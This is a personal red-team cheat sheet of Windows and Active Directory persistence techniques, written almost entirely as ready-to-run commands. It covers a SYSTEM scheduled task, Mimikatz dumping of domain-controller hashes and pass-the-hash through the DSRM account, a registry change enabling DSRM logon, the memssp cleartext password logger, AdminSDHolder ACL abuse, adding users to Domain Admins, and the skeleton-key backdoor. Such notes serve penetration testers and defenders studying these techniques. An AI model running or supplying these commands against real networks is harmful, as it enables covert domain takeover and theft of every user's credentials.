xct's notes
Search…
Persistence

Scheduled Task

1
schtasks /create /tn "xct" /ru "SYSTEM" /tr "c:\temp\xct.exe" /sc DAILY
2
schtasks /run /tn "xct"
3
schtasks /query /tn "xct" /FO list /v
4
schtasks /delete /tn "xct" /f
Copied!

WMI Subscriptions (Covenant)

Run "PersistWMI", this will execute along another program. E.g. the victim opens chrome our persistence calls back.

SRM

Directory Services Restore Mode Password only needed on promotion to DC, rarely used and changed, so we either obtain or change it:
1
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <dc>
2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <dc>
3
# Compare hashes, first one is DSRM
4
# We can pth into the dc with the ntlm hash of the dsrm, but first we have to change his logon behaviour
5
Enter-PSSession -Computername <dc>
6
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD
7
# Pth into it
8
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<domain> /user:Administrator /ntlm:<hash> /run:powershell.exe"'
Copied!

Custom SSP

Security Support Provider, with mimikatz, mimilib.dll, which logs all passwords in cleartext:
1
Invoke-Mimikatz -Command '"misc::memssp"'
Copied!

Admin-SD Holder

Adds user to domain admin group (PowerView):
1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights All -Verbose
2
$session = New-PSSession -ComputerName <dc>
3
Invoke-Command -FilePath .\Invoke-SDPropagator -Session $session
4
Enter-PSSession -Session $session
Copied!

Add user to domain admins

1
Add-DomainGroupMember -Identity 'Domain Admins' -Members <user> -Verbose
Copied!

Skeleton Key

1
# This lets you log into every account with the password "mimikatz", you should compile it yourself and change that probably. You might also need to remove process protection before running it
2
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <name>
Copied!

AppInit DLLs

Persistence – AppInit DLLs
Penetration Testing Lab

NetSH Persistence

3gstudent-Blog
3gstudent-Blog

Universal Password Backdoors with Frida

SensePost | Recreating known universal windows password backdoors with frida
Last modified 1yr ago